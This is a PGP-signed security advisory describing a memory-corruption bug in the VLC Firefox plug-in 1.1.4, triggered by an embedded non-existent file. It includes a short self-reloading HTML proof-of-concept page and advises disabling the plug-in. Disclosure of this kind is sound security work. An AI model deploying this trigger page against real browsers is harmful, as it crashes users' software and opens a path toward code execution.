-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

==================================================================================
==================================================================================
 VLC Multimedia Firefox Plug-in 1.1.4 non-existant file memory corruption

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.altervista.org/

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Tested on:
 Windows 7 professional full patched against Firefox 3.6.10
==================================================================================
==================================================================================
 DESCRIPTION:
 
 VLC Media Player offers a plug-in for Firefox to reproduce embedded video/audio
 files.
 It is possible, passing to "src" parameter a non-existant file (indipendently
 of file extension, to cause a memory corruption which could lead into an
 arbitrary code execution.
==================================================================================
==================================================================================
 PROOF OF CONCEPT:

 <html>  
   <body onload="setTimeout('location.reload()', 100);">
     <embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
   </body>
 </html>

==================================================================================
==================================================================================
 SOLUTION:
 Disable plug-in
==================================================================================
==================================================================================

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)

iQIcBAEBAgAGBQJMvWLPAAoJELleC2c7YdP1Y6EP/Ruk3uslIJnFhudCofKSkfvA
m8rsP+sdQPqFn+LBXVuVmIlGKArabfRaqe7zHWLf/zI+s63kTQR/x28sJx9bWvwV
sob47+s5Rs8Wcyl48LSx3Wlk4Uvh5D6/DTbvwHHBOorfltp1Rat8iy1ZnYXuVqWH
I/Xi8fw9jw69AG1sfpdJnOE+9gRg1HjlJ81hPLK3SytHytDNw8w2AeFGNVX60MTI
pIIC/EVWrlIDy+Sbwrl7E/h4ZIYA/uuTm8wL68mKwZmhWCRMsIoQX275DfKccHGJ
joGstrHsdOHJzLd7t/FG0K6OWR1iltu4UNCmba/vZiA+sgj/94wHELtN6+3QYq0Y
fSjQIX/3K2w0Pv/t+EbYceoqUgplV1oM5c9iQJUrErlQuhrvv1kYd0hj2IOLDbyt
YBtn5jXxL4cBdGftak4+TIwhQpdZE/x8BGWQPn9WtPgOFgQfr0hvgrdSraFux3nL
S2K6NvUlWKEau2jBh4RZG2MmdWfOEnyEyWnCKteyk4VMc59mKLfKtdncB7FiM7jb
2EZlHPZ2FCawiCHwVvsLgQxXBObK92Y0e+ziAtgilANVSP+zteJVb2YNBKK50dGL
6/bCEEoDx4WWGW2wHHeZEQ4oRl3jkXCakaq65RItaKm4QodV8xsALaqN99FSuofH
xpvokUyG/LPi3G50YPgE
=MKL4
-----END PGP SIGNATURE-----